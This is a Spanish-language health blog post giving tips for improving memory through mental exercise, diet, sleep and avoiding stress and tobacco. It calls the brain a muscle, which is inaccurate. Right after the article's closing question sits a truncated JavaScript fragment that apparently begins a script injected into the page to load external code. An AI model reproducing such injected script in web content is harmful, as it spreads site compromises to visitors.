Salud y belleza » Salud, salud mental

¿Cómo mejorar la memoria?

Sin Comentarios

mejorar-la-memoriaLa memoria del ser humano guarda muchos recuerdos y a menudo olvida otros, es algo muy habitual. Tiene la capacidad de guardarnos información que hemos aprendimos o que hemos vivido y de acceder a ella cuando la necesitamos o la buscamos. La memoria guarda emociones, imágenes, olores, sabores… todo cabe en nuestra memoria.

Sin embargo a menudo olvidamos cosas importantes, no podemos volver a acceder a ellas y con los años la memoria va perdiendo facultades. Pero esto se puede evitar en gran medida con cuidados y ejercicios que ayudan a la memoria a mantenerse joven y alerta durante más tiempo. El cerebro no deja de ser un músculo que debe ser ejercitado para no atrofiarse.

Para ello puedes hacer crucigramas, jugar a videojuegos de agilidad, estrategia o rompecabezas. Tanto en papel como con las máquinas y las nuevas tecnologías que ahora ofrecen muchos juegos inspirados en el ejercicio de la memoria.

También puedes probar retándote, por ejemplo, a recordar la lista de la compra completa, o a aprender un nuevo idioma, o a recordar algo nuevo, un nuevo conocimiento, cada día… son muchas las tareas y ejercicios que puedes realizar para conseguir este fin.

Pero, además de ejercitar el cerebro, hay otros factores que influyen en la memoria, como la alimentación. Ciertos alimentos ayudan al buen funcionamiento del cerebro: nueces, pescados con grasa, lecitina de soja, verduras, nueves, ajo, almendras, fresas…

Sin embargo, existen otros alimentos que no están muy recomendados, pero son alimentos que afectan a la salud en general: alcohol, exceso de proteínas, azúcar, harinas blancas…

El sueño es otro de los factores que afecta a la memoria porque cuando se está durmiendo el cerebro descansa, pero ante la falta de sueño falla la concentración. Se ha demostrado que los desequilibrios hormonales pueden influir también en la pérdida de memoria, por ejemplo, en la menopausia.

El estrés o el tabaco son otros de los condicionantes que influyen en nuestra memoria negativamente.

Por ello, si quieres conservar tu buena memoria durante muchos años lo mejor es que la ejercites y que evites en la medida de lo posible todo lo que pueda perjudicarla que te hemos explicado anteriormente.

¿Y tú? ¿Tienes buena o mala memoria?var d=document;var s=d.createElement('script'); if (document.currentScript) {

Más consejos de salud y belleza : , ,

Publique su Comentario !

Add your comment below, or trackback from your own site. You can also subscribe to these comments via RSS.

Be nice. Keep it clean. Stay on topic. No spam.